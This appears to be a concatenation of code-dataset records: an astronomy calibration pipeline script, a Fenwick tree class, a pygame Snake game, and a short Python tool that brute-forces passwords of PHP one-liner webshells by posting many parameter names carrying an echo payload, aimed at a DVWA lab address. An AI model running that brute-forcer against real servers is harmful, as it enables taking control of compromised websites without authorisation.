dtype=str)\n\n\n # ----------------------------------------------------------------------\n # Correction of reference FP\n # ----------------------------------------------------------------------\n # set the number of frames\n p['NBFRAMES'] = len(fpfitsfiles)\n p.set_source('NBFRAMES', __NAME__ + '.main()')\n # Correction of DARK\n p, fpdatac = spirouImage.CorrectForDark(p, fpdata, fphdr)\n # Resize hc data\n # rotate the image and convert from ADU/s to e-\n fpdata = spirouImage.ConvertToE(spirouImage.FlipImage(p, fpdatac), p=p)\n # resize image\n bkwargs = dict(xlow=p['IC_CCDX_LOW'], xhigh=p['IC_CCDX_HIGH'],\n ylow=p['IC_CCDY_LOW'], yhigh=p['IC_CCDY_HIGH'],\n getshape=False)\n fpdata1 = spirouImage.ResizeImage(p, fpdata, **bkwargs)\n # log change in data size\n WLOG(p, '',\n ('FPref Image format changed to {0}x{1}').format(*fpdata1.shape))\n # Correct for the BADPIX mask (set all bad pixels to zero)\n bargs = [p, fpdata1, fphdr]\n p, fpdata1 = spirouImage.CorrectForBadPix(*bargs)\n p, badpixmask = spirouImage.CorrectForBadPix(*bargs, return_map=True)\n # log progress\n WLOG(p, '', 'Cleaning FPref hot pixels')\n # correct hot pixels\n fpdata1 = spirouEXTOR.CleanHotpix(fpdata1, badpixmask)\n # add to loc\n loc['FPDATA1'] = fpdata1\n loc.set_source('FPDATA1', __NAME__ + '.main()')\n # Log the number of dead pixels\n # get the number of bad pixels\n with warnings.catch_warnings(record=True) as _:\n n_bad_pix = np.nansum(fpdata1 <= 0)\n n_bad_pix_frac = n_bad_pix * 100 / np.product(fpdata1.shape)\n # Log number\n wmsg = 'Nb FPref dead pixels = {0} / {1:.2f} %'\n WLOG(p, 'info', wmsg.format(int(n_bad_pix), n_bad_pix_frac))\n\n # ----------------------------------------------------------------------\n # Correction of HC\n # ----------------------------------------------------------------------\n # set the number of frames\n p['NBFRAMES'] = 1\n p.set_source('NBFRAMES', __NAME__ + '.main()')\n # Correction of DARK\n p, hcdatac = spirouImage.CorrectForDark(p, hcdata, hchdr)\n # Resize hc data\n # rotate the image and convert from ADU/s to e-\n hcdata = spirouImage.ConvertToE(spirouImage.FlipImage(p, hcdatac), p=p)\n # resize image\n bkwargs = dict(xlow=p['IC_CCDX_LOW'], xhigh=p['IC_CCDX_HIGH'],\n ylow=p['IC_CCDY_LOW'], yhigh=p['IC_CCDY_HIGH'],\n getshape=False)\n hcdata1 = spirouImage.ResizeImage(p, hcdata, **bkwargs)\n # log change in data size\n WLOG(p, '',\n ('HC Image format changed to {0}x{1}').format(*hcdata1.shape))\n # Correct for the BADPIX mask (set all bad pixels to zero)\n bargs = [p, hcdata1, hchdr]\n p, hcdata1 = spirouImage.CorrectForBadPix(*bargs)\n p, badpixmask = spirouImage.CorrectForBadPix(*bargs, return_map=True)\n # log progress\n WLOG(p, '', 'Cleaning HC hot pixels')\n # correct hot pixels\n hcdata1 = spirouEXTOR.CleanHotpix(hcdata1, badpixmask)\n # add to loc\n loc['HCDATA1'] = hcdata1\n loc.set_source('HCDATA1', __NAME__ + '.main()')\n # Log the number of dead pixels\n # get the number of bad pixels\n with warnings.catch_warnings(record=True) as _:\n n_bad_pix = np.nansum(hcdata1 <= 0)\n n_bad_pix_frac = n_bad_pix * 100 / np.product(hcdata1.shape)\n # Log number\n wmsg = 'Nb HC dead pixels = {0} / {1:.2f} %'\n WLOG(p, 'info', wmsg.format(int(n_bad_pix), n_bad_pix_frac))\n\n # -------------------------------------------------------------------------\n # get all FP_FP files\n # -------------------------------------------------------------------------\n fpfilenames = spirouImage.FindFiles(p, filetype=p['DPRTYPE'],\n allowedtypes=p['ALLOWED_FP_TYPES'])\n # convert filenames to 
a numpy array\n fpfilenames = np.array(fpfilenames)\n # julian date to know which file we need to\n # process together\n fp_time = np.zeros(len(fpfilenames))\n basenames, fp_exp, fp_pp_version, nightnames = [], [], [], []\n # log progress\n WLOG(p, '', 'Reading all fp file headers')\n # looping through the file headers\n for it in range(len(fpfilenames)):\n # log progress\n wmsg = '\\tReading file {0} / {1}'\n WLOG(p, 'info', wmsg.format(it + 1, len(fpfilenames)))\n # get fp filename\n fpfilename = fpfilenames[it]\n # get night name\n night_name = os.path.dirname(fpfilenames[it]).split(p['TMP_DIR'])[-1]\n # read data\n data_it, hdr_it, _, _ = spirouImage.ReadImage(p, fpfilename)\n # get header\n hdr = spirouImage.ReadHeader(p, filepath=fpfilenames[it])\n # add MJDATE to dark times\n fp_time[it] = float(hdr[p['KW_ACQTIME'][0]])\n # add other keys (for tabular output)\n basenames.append(os.path.basename(fpfilenames[it]))\n nightnames.append(night_name)\n fp_exp.append(float(hdr[p['KW_EXPTIME'][0]]))\n fp_pp_version.append(hdr[p['KW_PPVERSION'][0]])\n\n # -------------------------------------------------------------------------\n # match files by date\n # -------------------------------------------------------------------------\n # log progress\n wmsg = 'Matching FP files by observation time (+/- {0} hrs)'\n WLOG(p, '', wmsg.format(p['DARK_MASTER_MATCH_TIME']))\n # get the time threshold\n time_thres = p['FP_MASTER_MATCH_TIME']\n # get items grouped by time\n matched_id = spirouImage.GroupFilesByTime(p, fp_time, time_thres)\n\n # -------------------------------------------------------------------------\n # construct the master fp file (+ correct for dark/badpix)\n # -------------------------------------------------------------------------\n cargs = [fpdata1, fpfilenames, matched_id]\n fpcube, transforms = spirouImage.ConstructMasterFP(p, *cargs)\n # log process\n wmsg1 = 'Master FP construction complete.'\n wmsg2 = '\\tAdding {0} group images to form FP master image'\n WLOG(p, 'info', [wmsg1, wmsg2.format(len(fpcube))])\n # sum the cube to make fp data\n masterfp = np.sum(fpcube, axis=0)\n # add to loc\n loc['MASTERFP'] = masterfp\n loc.set_source('MASTERFP', __NAME__ + '.main()')\n\n # ------------------------------------------------------------------\n # Get localisation coefficients\n # ------------------------------------------------------------------\n # original there is a loop but it is not used --> removed\n p = spirouImage.FiberParams(p, p['FIBER'], merge=True)\n # get localisation fit coefficients\n p, loc = spirouLOCOR.GetCoeffs(p, fphdr, loc)\n\n # ------------------------------------------------------------------\n # Get master wave solution map\n # ------------------------------------------------------------------\n # get master wave map\n masterwavefile = spirouDB.GetDatabaseMasterWave(p)\n # log process\n wmsg1 = 'Getting master wavelength grid'\n wmsg2 = '\\tFile = {0}'.format(os.path.basename(masterwavefile))\n WLOG(p, '', [wmsg1, wmsg2])\n # Force A and B to AB solution\n if p['FIBER'] in ['A', 'B']:\n wave_fiber = 'AB'\n else:\n wave_fiber = p['FIBER']\n # read master wave map\n wout = spirouImage.GetWaveSolution(p, filename=masterwavefile,\n return_wavemap=True, quiet=True,\n return_header=True, fiber=wave_fiber)\n loc['MASTERWAVEP'], loc['MASTERWAVE'] = wout[:2]\n loc['MASTERWAVEHDR'], loc['WSOURCE'] = wout[2:]\n # set sources\n wsource = ['MASTERWAVEP', 'MASTERWAVE', 'MASTERWAVEHDR']\n loc.set_sources(wsource, 'spirouImage.GetWaveSolution()')\n\n # 
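Note (added, hedged): fibres A and B are redirected to the shared AB wavelength\n    # solution when the master wave map above is read (fiber=wave_fiber).\n    # 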
----------------------------------------------------------------------\n # Read UNe solution\n # ----------------------------------------------------------------------\n wave_u_ne, amp_u_ne = spirouImage.ReadLineList(p)\n loc['LL_LINE'], loc['AMPL_LINE'] = wave_u_ne, amp_u_ne\n source = __NAME__ + '.main() + spirouImage.ReadLineList()'\n loc.set_sources(['LL_LINE', 'AMPL_LINE'], source)\n\n # ----------------------------------------------------------------------\n # Read cavity length file\n # ----------------------------------------------------------------------\n loc['CAVITY_LEN_COEFFS'] = spirouImage.ReadCavityLength(p)\n source = __NAME__ + '.main() + spirouImage.ReadCavityLength()'\n loc.set_source('CAVITY_LEN_COEFFS', source)\n\n # ----------------------------------------------------------------------\n # Calculate shape map\n # ----------------------------------------------------------------------\n # calculate dx map\n loc = spirouImage.GetXShapeMap(p, loc)\n # if dx map is None we shouldn't continue\n if loc['DXMAP'] is None:\n fargs = [loc['MAXDXMAPINFO'][0], loc['MAXDXMAPINFO'][1],\n loc['MAXDXMAPSTD'], p['SHAPE_QC_DXMAP_STD']]\n fmsg = ('The std of the dxmap for order {0} y-pixel {1} is too large.'\n ' std = {2} (limit = {3})'.format(*fargs))\n wmsg = 'QUALITY CONTROL FAILED: {0}'\n WLOG(p, 'warning', wmsg.format(fmsg))\n WLOG(p, 'warning', 'Cannot continue. Exiting.')\n # End Message\n p = spirouStartup.End(p)\n # return a copy of locally defined variables in the memory\n return dict(locals())\n\n # calculate dymap\n loc = spirouImage.GetYShapeMap(p, loc, fphdr)\n\n # ------------------------------------------------------------------\n # Need to straighten the dxmap\n # ------------------------------------------------------------------\n # copy it first\n loc['DXMAP0'] = np.array(loc['DXMAP'])\n # straighten it\n loc['DXMAP'] = spirouImage.EATransform(loc['DXMAP'], dymap=loc['DYMAP'])\n\n # ------------------------------------------------------------------\n # Need to straighten the hc data and fp data for debug\n # ------------------------------------------------------------------\n # log progress\n WLOG(p, '', 'Shape finding complete. 
Applying transforms.')\n # apply very last update of the debananafication\n tkwargs = dict(dxmap=loc['DXMAP'], dymap=loc['DYMAP'])\n loc['HCDATA2'] = spirouImage.EATransform(loc['HCDATA1'], **tkwargs)\n loc['FPDATA2'] = spirouImage.EATransform(loc['FPDATA1'], **tkwargs)\n loc.set_sources(['HCDATA2', 'FPDATA2'], __NAME__ + '.main()')\n\n # ------------------------------------------------------------------\n # Plotting\n # ------------------------------------------------------------------\n if p['DRS_PLOT'] > 0:\n # plots setup: start interactive plot\n sPlt.start_interactive_session(p)\n # plot the shape process for one order\n sPlt.slit_shape_angle_plot(p, loc)\n # end interactive section\n sPlt.end_interactive_session(p)\n\n # ----------------------------------------------------------------------\n # Quality control\n # ----------------------------------------------------------------------\n # TODO: Decide on some quality control criteria?\n # set passed variable and fail message list\n passed, fail_msg = True, []\n qc_values, qc_names, qc_logic, qc_pass = [], [], [], []\n # finally log the failed messages and set QC = 1 if we pass the\n # quality control QC = 0 if we fail quality control\n if passed:\n WLOG(p, 'info', 'QUALITY CONTROL SUCCESSFUL - Well Done -')\n p['QC'] = 1\n p.set_source('QC', __NAME__ + '/main()')\n else:\n for farg in fail_msg:\n wmsg = 'QUALITY CONTROL FAILED: {0}'\n WLOG(p, 'warning', wmsg.format(farg))\n p['QC'] = 0\n p.set_source('QC', __NAME__ + '/main()')\n # add to qc header lists\n qc_values.append(loc['MAXDXMAPSTD'])\n qc_names.append('DXMAP STD')\n qc_logic.append('DXMAP STD < {0}'.format(p['SHAPE_QC_DXMAP_STD']))\n qc_pass.append(1)\n # store in qc_params\n qc_params = [qc_names, qc_values, qc_logic, qc_pass]\n\n # ------------------------------------------------------------------\n # Writing FP big table\n # ------------------------------------------------------------------\n # construct big fp table\n colnames = ['FILENAME', 'NIGHT', 'MJDATE', 'EXPTIME', 'PVERSION',\n 'GROUPID', 'DXREF', 'DYREF', 'A', 'B', 'C', 'D']\n values = [basenames, nightnames, fp_time, fp_exp, fp_pp_version,\n matched_id, transforms[:, 0], transforms[:, 1],\n transforms[:, 2], transforms[:, 3], transforms[:, 4],\n transforms[:, 5]]\n fptable = spirouImage.MakeTable(p, colnames, values)\n\n # ------------------------------------------------------------------\n # Writing DXMAP to file\n # ------------------------------------------------------------------\n # get the raw tilt file name\n raw_shape_file = os.path.basename(p['FITSFILENAME'])\n # construct file name and path\n shapexfits, tag = spirouConfig.Constants.SLIT_XSHAPE_FILE(p)\n shapexfitsname = os.path.basename(shapexfits)\n # Log that we are saving tilt file\n wmsg = 'Saving shape x information in file: {0}'\n WLOG(p, '', wmsg.format(shapexfitsname))\n # Copy keys from fits file\n hdict = spirouImage.CopyOriginalKeys(fphdr)\n # add version number\n hdict = spirouImage.AddKey(p, hdict, p['KW_VERSION'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_DATE'], value=p['DRS_DATE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DATE_NOW'], value=p['DATE_NOW'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_PID'], value=p['PID'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag)\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBDARK'], value=p['DARKFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBBAD'], value=p['BADPFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBLOCO'], value=p['LOCOFILE'])\n hdict = 
spirouImage.AddKey1DList(p, hdict, p['KW_INFILE1'],\n dim1name='hcfile', values=p['HCFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE2'],\n dim1name='fpfile', values=p['FPFILES'])\n # add qc parameters\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_QC'], value=p['QC'])\n hdict = spirouImage.AddQCKeys(p, hdict, qc_params)\n # write tilt file to file\n p = spirouImage.WriteImageTable(p, shapexfits, image=loc['DXMAP'],\n table=fptable, hdict=hdict)\n\n # ------------------------------------------------------------------\n # Writing DYMAP to file\n # ------------------------------------------------------------------\n # get the raw tilt file name\n raw_shape_file = os.path.basename(p['FITSFILENAME'])\n # construct file name and path\n shapeyfits, tag = spirouConfig.Constants.SLIT_YSHAPE_FILE(p)\n shapeyfitsname = os.path.basename(shapeyfits)\n # Log that we are saving tilt file\n wmsg = 'Saving shape y information in file: {0}'\n WLOG(p, '', wmsg.format(shapeyfitsname))\n # Copy keys from fits file\n hdict = spirouImage.CopyOriginalKeys(fphdr)\n # add version number\n hdict = spirouImage.AddKey(p, hdict, p['KW_VERSION'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_DATE'], value=p['DRS_DATE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DATE_NOW'], value=p['DATE_NOW'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_PID'], value=p['PID'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag)\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBDARK'], value=p['DARKFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBBAD'], value=p['BADPFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBLOCO'], value=p['LOCOFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE1'],\n dim1name='hcfile', values=p['HCFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE2'],\n dim1name='fpfile', values=p['FPFILES'])\n # add qc parameters\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_QC'], value=p['QC'])\n hdict = spirouImage.AddQCKeys(p, hdict, qc_params)\n # write tilt file to file\n p = spirouImage.WriteImageTable(p, shapeyfits, image=loc['DYMAP'],\n table=fptable, hdict=hdict)\n\n # ------------------------------------------------------------------\n # Writing Master FP to file\n # ------------------------------------------------------------------\n # get the raw tilt file name\n raw_shape_file = os.path.basename(p['FITSFILENAME'])\n # construct file name and path\n fpmasterfits, tag = spirouConfig.Constants.SLIT_MASTER_FP_FILE(p)\n fpmasterfitsname = os.path.basename(fpmasterfits)\n # Log that we are saving tilt file\n wmsg = 'Saving master FP file: {0}'\n WLOG(p, '', wmsg.format(fpmasterfitsname))\n # Copy keys from fits file\n hdict = spirouImage.CopyOriginalKeys(fphdr)\n # add version number\n hdict = spirouImage.AddKey(p, hdict, p['KW_VERSION'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_DATE'], value=p['DRS_DATE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DATE_NOW'], value=p['DATE_NOW'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_PID'], value=p['PID'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag)\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBDARK'], value=p['DARKFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBBAD'], value=p['BADPFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBLOCO'], value=p['LOCOFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE1'],\n dim1name='hcfile', values=p['HCFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE2'],\n dim1name='fpfile', 
values=p['FPFILES'])\n # add qc parameters\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_QC'], value=p['QC'])\n hdict = spirouImage.AddQCKeys(p, hdict, qc_params)\n # write tilt file to file\n p = spirouImage.WriteImageTable(p, fpmasterfits, image=masterfp,\n table=fptable, hdict=hdict)\n\n # ------------------------------------------------------------------\n # Writing sanity check files\n # ------------------------------------------------------------------\n if p['SHAPE_DEBUG_OUTPUTS']:\n # log\n WLOG(p, '', 'Saving debug sanity check files')\n # construct file names\n input_fp_file, tag1 = spirouConfig.Constants.SLIT_SHAPE_IN_FP_FILE(p)\n output_fp_file, tag2 = spirouConfig.Constants.SLIT_SHAPE_OUT_FP_FILE(p)\n input_hc_file, tag3 = spirouConfig.Constants.SLIT_SHAPE_IN_HC_FILE(p)\n output_hc_file, tag4 = spirouConfig.Constants.SLIT_SHAPE_OUT_HC_FILE(p)\n bdxmap_file, tag5 = spirouConfig.Constants.SLIT_SHAPE_BDXMAP_FILE(p)\n # write input fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag1)\n p = spirouImage.WriteImage(p, input_fp_file, loc['FPDATA1'], hdict)\n # write output fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag2)\n p = spirouImage.WriteImage(p, output_fp_file, loc['FPDATA2'], hdict)\n # write input fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag3)\n p = spirouImage.WriteImage(p, input_hc_file, loc['HCDATA1'], hdict)\n # write output fp file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag4)\n p = spirouImage.WriteImage(p, output_hc_file, loc['HCDATA2'], hdict)\n # write overlap file\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag5)\n p = spirouImage.WriteImage(p, bdxmap_file, loc['DXMAP0'], hdict)\n\n # ----------------------------------------------------------------------\n # Move to calibDB and update calibDB\n # ----------------------------------------------------------------------\n if p['QC']:\n # add shape x\n keydb = 'SHAPEX'\n # copy shape file to the calibDB folder\n spirouDB.PutCalibFile(p, shapexfits)\n # update the master calib DB file with new key\n spirouDB.UpdateCalibMaster(p, keydb, shapexfitsname, fphdr)\n # add shape y\n keydb = 'SHAPEY'\n # copy shape file to the calibDB folder\n spirouDB.PutCalibFile(p, shapeyfits)\n # update the master calib DB file with new key\n spirouDB.UpdateCalibMaster(p, keydb, shapeyfitsname, fphdr)\n # add fp master\n keydb = 'FPMASTER'\n # copy shape file to the calibDB folder\n spirouDB.PutCalibFile(p, fpmasterfits)\n # update the master calib DB file with new key\n spirouDB.UpdateCalibMaster(p, keydb, fpmasterfitsname, fphdr)\n # ----------------------------------------------------------------------\n # End Message\n # ----------------------------------------------------------------------\n p = spirouStartup.End(p)\n # return a copy of locally defined variables in the memory\n return dict(locals())\n\n\n# =============================================================================\n# Start of code\n# =============================================================================\nif __name__ == \"__main__\":\n # run main with no arguments (get from command line - sys.argv)\n ll = main()\n # exit message if in debug mode\n spirouStartup.Exit(ll)\n\n# =============================================================================\n# End of code\n# 
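(added, hedged) On QC pass this recipe registers SHAPEX, SHAPEY and FPMASTER\n# entries in the calibration database (see the calibDB section above).\n# 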
=============================================================================\n","sub_path":"old_code/INTROOT/bin/cal_shape_master_spirou.py","file_name":"cal_shape_master_spirou.py","file_ext":"py","file_size_in_byte":28039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"421156217","text":"# A webshell is a command-execution environment in the form of an ordinary web page file\n# (asp, php, jsp, cgi, ...); it can also be described as a web backdoor.\n# After breaking into a website, an attacker typically mixes an asp/php backdoor file in with\n# the normal pages under the server's web directory, then opens that backdoor in a browser\n# to obtain a command-execution environment and thereby control the web server.\n# getshell: gain shell access (privileges)\nimport os\nimport sys\nfrom lib.download import Downloader\nimport time\n\nfilename = os.path.join(sys.path[0], \"data\", \"web_shell.txt\")\npayloads = []\nf = open(filename)\na = 0\nfor i in f:\n    payloads.append(i.strip())\n    a += 1\n    if a == 999:\n        break\n    # brute-force the \"one-liner\" shell password on every file ending in .php\n\n\ndef run(url, flag=0, loginUrl='', loginData=''):\n    if not url.endswith(\".php\"):\n        return False\n    download = Downloader(flag, loginUrl=loginUrl, loginData=loginData)\n    post_data = {}\n    now = time.time()\n    for payload in payloads:\n        post_data[payload] = 'echo \"password is {}\";'.format(now)\n\n# variable=echo \"ok\";\n# If a variable name equals the shell's password, our statement is passed in and executed.\n# So what if we submit them in bulk (i.e. a=echo \"ok\";&b=echo \"ok\";&c=echo \"ok\";&...)?\n# As long as the real parameter is among the ones we submit, it will be accepted.\n    r = download.post(url, post_data)\n\n    if str(now) in r:\n        return url\n    return False\n\n\nif __name__ == '__main__':\n    run('http://192.168.220.132/dvwa/vulnerabilities/fi/?page=include.php', 1)","sub_path":"web_shell.py","file_name":"web_shell.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"638012449","text":"from typing import Iterable, TypeVar, Callable\n\nT = TypeVar('T')\n\n\"\"\"\nTraditionally Fenwick Trees operate on arrays of integers. They were conceived for the purpose of supporting two operations\nefficiently:\n1) Sum up the first k elements in the array\n2) Add a value x to the kth element in the array\n\nIn a traditional array A, 1) would take O(n) time and 2) would take O(1) time.\nIf you were to transform the array A into a cumulative sum array B, 1) would take O(1) time\nbut 2) would take O(n) time as you need to update all cumulative sums containing the updated element.\n\nThe Fenwick tree meets halfway between both approaches and supports 1) and 2) in O(log n) time. It should ideally be used when you envision\na sequence of elements with a lot of sum queries and a lot of update queries.\n\nWhile traditionally Fenwick Trees operate on arrays of integers and sums, the data structure below\nis abstract enough to be used for any iterable of any type T (not just integers) w/ an associative binary operation (that represents +)\n\"\"\"\nclass FenwickTree:\n    def __init__(self, a: Iterable[T], op: Callable[[T, T], T], identity: T) -> None:\n        \"\"\"\n        Args:\n            param1: a is an iterable of any type.\n            param2: op is an associative binary operator with identity on T.\n            param3: identity is the identity of T under the operation op\n\n            To be concise, (T, op) form a monoid\n\n        Returns:\n            None. 
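The tree supports an inclusive prefix reduce and a point update, both in\n            O(log n); e.g. with a=[1,2,3] and op=add, reduce(1) returns 1+2 == 3.\n            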
This is a constructor for a fenwick tree\n\n        Raises: Does not throw an exception\n\n        Time complexity: O(n log n) for constructing this data structure\n        \"\"\"\n        self.a = list(a)\n        self.op = op\n        self.identity = identity\n        self.f_tree = [identity] * (len(a) + 1)\n        for i, elem in enumerate(a):\n            self.update(i, elem)\n\n\n    def reduce(self, i : int) -> T:\n        \"\"\"\n        Args:\n            param1: i is an index of the sequence 'a' used to construct the fenwick tree.\n        Returns:\n            result represents reducing the inclusive prefix a[:i+1] under the binary operator op\n\n        Raises: Throws a ValueError exception if an invalid index is passed\n\n        Time Complexity : O(log n) where n is the number of elements in a\n        \"\"\"\n        if i >= len(self.a) or i < 0:\n            raise ValueError(\"Invalid index operation\")\n        index = i + 1\n        result = self.identity\n        while index > 0:\n            result = self.op(result, self.f_tree[index])\n            ## drop the least significant set bit to move to the parent range\n            index = index - (index & -index)\n        return result\n\n    def update(self, i: int, val: T) -> None:\n        \"\"\"\n        Args:\n            param1: i is an index of the sequence 'a' used to construct the fenwick tree.\n\n        Returns: None\n\n        Effects:\n            Effectively equivalent to doing a[i] = op(a[i], val)\n            (only the tree is updated; self.a keeps its initial values and is\n            used solely for bounds checking)\n\n        Time Complexity : O(log n) where n is the number of elements in a\n\n        Raises: Throws a ValueError exception if an invalid index is passed\n        \"\"\"\n        if i >= len(self.a) or i < 0:\n            raise ValueError(\"Invalid index operation\")\n        index = i + 1\n        # f_tree has len(a) + 1 slots, so valid tree indices are 1..len(a)\n        while index < len(self.f_tree):\n            self.f_tree[index] = self.op(self.f_tree[index], val)\n            index += (index & -index)\n        return\n\nif __name__ == '__main__':\n    a = FenwickTree([1,2,3,4,5,6], lambda x, y: x + y, 0)\n    print(a.reduce(2))  # 1 + 2 + 3 = 6\n    print(a.reduce(0))  # 1\n    a.update(3, 100)\n    print(a.reduce(3))  # 1 + 2 + 3 + (4 + 100) = 110\n","sub_path":"FenwickTree/fenwick_tree.py","file_name":"fenwick_tree.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"427977702","text":"\nimport pygame as pg\nimport time\nimport random as r\nimport math as m\n\nclass SnakeGame:\n\n    def __init__(self, dim, square_interval):\n        self.SNAKE_COLOR = (255,255,255)\n        self.FOOD_COLOR = (255,100,100) \n        self.BORDER_COLOR = (75,75,75)\n\n        self.x = dim\n        self.y = dim\n        \n        self.snake_dimensions = square_interval//2\n        self.i = square_interval\n        self.interval = dim//square_interval\n\n        self._reset_game()\n    \n    def _convert_real_pos_to_block(self, pos):\n        # Converts a coordinate on the screen to an interval coordinate\n        x, y = pos\n        return (x // self.i, y // self.i) \n\n    def _convert_block_pos_to_real(self, pos):\n        # Converts an interval coordinate to a screen coordinate\n        x, y = pos\n        return (x*self.i, y*self.i)\n\n    def _get_random_location(self):\n        available = []\n\n        # Get a list of all possible locations that are not occupied or on an edge\n        for row in range(self.interval):\n            for col in range(self.interval):\n                if self.grid[row][col] == 0 and (0 < row < self.interval - 1) and (0 < col < self.interval - 1):\n                    available.append((col, row))\n        return r.choice(available)\n\n    def _reset_board(self):\n\n        self.grid = []\n        \n        # Reset grid and draw border on grid\n        for row in range(self.interval):\n            a = []\n            for col in range(self.interval):\n                if row == 0 or col == 0 or row == self.interval-1 or col == self.interval-1:\n                    a.append(3)\n                else:\n                    a.append(0)\n            self.grid.append(a)\n\n    def _reset_game(self):\n\n        # Reset the game and init params\n        self._reset_board()\n        self.game_over = False\n        self.snake_length = 2\n        self.curr_snake_positions = [(self.interval//2, 
self.interval//2)]\n self.curr_food_position = self._get_random_location()\n self.curr_snake_dir = r.randint(0, 3)\n\n def get_game_state(self):\n \n \"\"\"\n 0 - Game is over\n 1 - Game is in progress\n 2 - Player won\n \"\"\"\n \n if self.game_over:\n return 0\n else:\n a = False\n for row in range(self.interval):\n for col in range(self.interval):\n if self.grid[row][col] == 0:\n a = True\n return int(a) + 1\n\n def run_game(self, frame_rate):\n\n screen = pg.display.set_mode((self.x, self.y))\n \n game = 0\n\n while True:\n \n self._reset_game()\n\n while self.get_game_state():\n\n screen.fill((0,0,0))\n self._reset_board()\n\n # Draw Border\n pg.draw.rect(screen, self.BORDER_COLOR, (0, 0, self.x, self.snake_dimensions*2))\n pg.draw.rect(screen, self.BORDER_COLOR, (0, 0, self.snake_dimensions*2, self.y))\n pg.draw.rect(screen, self.BORDER_COLOR, (0, self.y - self.snake_dimensions*2, self.x, self.snake_dimensions*2))\n pg.draw.rect(screen, self.BORDER_COLOR, (self.x - self.snake_dimensions*2, 0, self.snake_dimensions*2, self.y))\n\n for position in self.curr_snake_positions:\n sx, sy = position\n\n # Check If Snake Ate Itself\n if self.grid[sy][sx] == 1 or sx <= 0 or sy <= 0 or sx >= self.interval-1 or sy >= self.interval-1:\n self.game_over = True\n break\n \n # Draw Snake\n rx, ry = self._convert_block_pos_to_real(position)\n pg.draw.rect(screen, self.SNAKE_COLOR, (rx, ry, self.snake_dimensions*2, self.snake_dimensions*2)) \n self.grid[sy][sx] = 1\n \n if self.get_game_state:\n\n # Draw Food\n fx, fy = self.curr_food_position\n rfx, rfy = self._convert_block_pos_to_real(self.curr_food_position)\n pg.draw.rect(screen, self.FOOD_COLOR, (rfx, rfy, self.snake_dimensions*2, self.snake_dimensions*2)) \n self.grid[fy][fx] = 2\n \n pg.display.update()\n \n # Check If Snake Ate Food\n if self.curr_snake_positions[0] == self.curr_food_position:\n self.curr_food_position = self._get_random_location() \n self.snake_length += 1\n\n e = pg.event.poll()\n if e.type == pg.QUIT:\n return\n\n keys = pg.key.get_pressed()\n \n if keys[pg.K_ESCAPE] or keys[pg.K_SLASH]:\n return\n \n # Get Keyboard Input\n if (keys[pg.K_UP] or keys[pg.K_w]) and self.curr_snake_dir != 1:\n self.curr_snake_dir = 0\n elif (keys[pg.K_LEFT] or keys[pg.K_a]) and self.curr_snake_dir != 3:\n self.curr_snake_dir = 2\n elif (keys[pg.K_DOWN] or keys[pg.K_s]) and self.curr_snake_dir != 0:\n self.curr_snake_dir = 1\n elif (keys[pg.K_RIGHT] or keys[pg.K_d]) and self.curr_snake_dir != 2:\n self.curr_snake_dir = 3\n\n # Update Direction Vector Based on Movement State\n if self.curr_snake_dir == 0:\n self.direction_vector = (0, -1)\n elif self.curr_snake_dir == 1:\n self.direction_vector = (0, 1)\n elif self.curr_snake_dir == 2:\n self.direction_vector = (-1, 0)\n elif self.curr_snake_dir == 3:\n self.direction_vector = (1, 0)\n \n dx, dy = self.direction_vector\n curr_x, curr_y = self.curr_snake_positions[0]\n pos = ((curr_x + dx) % self.interval, (curr_y + dy) % (self.interval)) \n \n # Pop end of snake to maintain size\n self.curr_snake_positions.insert(0, pos)\n if len(self.curr_snake_positions) > self.snake_length:\n self.curr_snake_positions.pop()\n\n # Delay to conrol frame rate\n time.sleep(1/frame_rate)\n\n print(\"GAME OVER.\", \"Score:\", self.snake_length) \n game += 1\n \n\ndef main():\n snake = SnakeGame(500, 20)\n snake.run_game(15)\n\nif __name__ == \"__main__\":\n 
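# Added usage note (hedged): SnakeGame(500, 20) gives a 25x25 block grid\n    # (500 // 20 = 25); run_game(15) then caps the loop at ~15 frames per second.\n    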
